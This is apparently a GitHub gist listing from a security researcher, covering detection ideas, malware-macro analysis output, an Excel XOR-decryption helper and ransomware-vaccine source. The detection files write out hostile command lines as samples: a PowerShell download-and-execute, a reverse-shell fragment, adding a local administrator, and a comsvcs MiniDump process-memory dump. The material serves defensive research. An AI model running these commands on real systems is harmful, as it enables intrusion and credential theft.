John Lambert JohnLaTwC

  • Microsoft Corporation
@JohnLaTwC
JohnLaTwC / ideas.txt
Last active January 30, 2023 14:09
Detection ideas
// suspicious PowerShell commands contacting URLs, adding admins, receiving commands
powershell -w 1 -exec bypass -e aQBlAH… --> "iex (("
powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "...
powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('.
powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")"
powershell.exe /c Get-WmiObject Win32_ComputerSystemProduct | Select-Object UUID
powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber
powershell.exe /c Get-WmiObject Win32_PhysicalMedia | Select-Object SerialNumber
C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe"
@JohnLaTwC
JohnLaTwC / examples.txt
Last active December 23, 2023 19:04
comsvcs MiniDump examples
By @JohnLaTwC
References:
https://risksense.com/blog/hidden-gems-in-windows-the-hunt-is-on/ by Jenna Magius and Nate Caroe (@RiskSense)
https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
https://twitter.com/SBousseaden/status/1407742041170268166 - Calling MiniDump export by ordinal examples: (comsvcs,#24)
Detection Examples:
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump <PID> \Windows\Temp\<filename>.dmp full
> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /reg:64
> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /reg:32
> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe"
@JohnLaTwC
JohnLaTwC / VBA macro
Created October 15, 2020 18:41
e440eb7774fc2b06f56e5bc627e0d5d1d656fdd73713e6d3c274369d9cb60223
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: e440eb7774fc2b06f56e5bc627e0d5d1d656fdd73713e6d3c274369d9cb60223
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Dim isR As Boolean
@JohnLaTwC
JohnLaTwC / hashes.txt
Created October 12, 2020 14:25
XOR encrypted XLS files
https://www.virustotal.com/gui/search/gen_excel_xor_obfuscation_velvetsweatshop/comments
XOR encrypted .XLS
@JohnLaTwC
JohnLaTwC / remove.py
Created October 10, 2020 17:17
Python code to remove XOR encryption
import win32com.client

# Sample name is the file's SHA-256 as stored in the analysis folder; Excel COM
# resolves paths relative to Excel's own working directory, so an absolute path
# is safer in practice.
filename = r"419301a8b6bb734a27fe3682eb6231113c36ce525c4b0dec220cb9b9b7f9ca0e"
# Default password Excel applies when a legacy XLS is XOR-obfuscated without a user-set one
password = "VelvetSweatshop"
encryption_removed_filename = filename + '.saved.xls'

# Drive Excel over COM: open the workbook with the password, then save a copy.
# The saved copy is written without the XOR encryption layer, so it can be
# parsed by tools such as olevba that cannot read the encrypted original.
xlApp = win32com.client.Dispatch("Excel.Application")
xlwb = xlApp.Workbooks.Open(filename, Password=password)
xlwb.SaveAs(encryption_removed_filename)
xlwb.Close()
xlApp.Quit()
@JohnLaTwC
JohnLaTwC / hashes on VT
Created October 10, 2020 14:20
XLS XOR encryption samples
@JohnLaTwC
JohnLaTwC / raccine.cpp
Created October 6, 2020 03:01
raccine
// Raccine
// A Simple Ransomware Vaccine
// https://github.com/Neo23x0/Raccine
//
// Florian Roth, Ollie Whitehouse
#include <WCHAR.h>
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2 - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public RUNNING As Boolean
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a16ac529b34aab3eb7e262b830d73aa78aa967ad4a8810349040cdbbe2e885b5
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#If Mac Then
Private Sub Document_Open()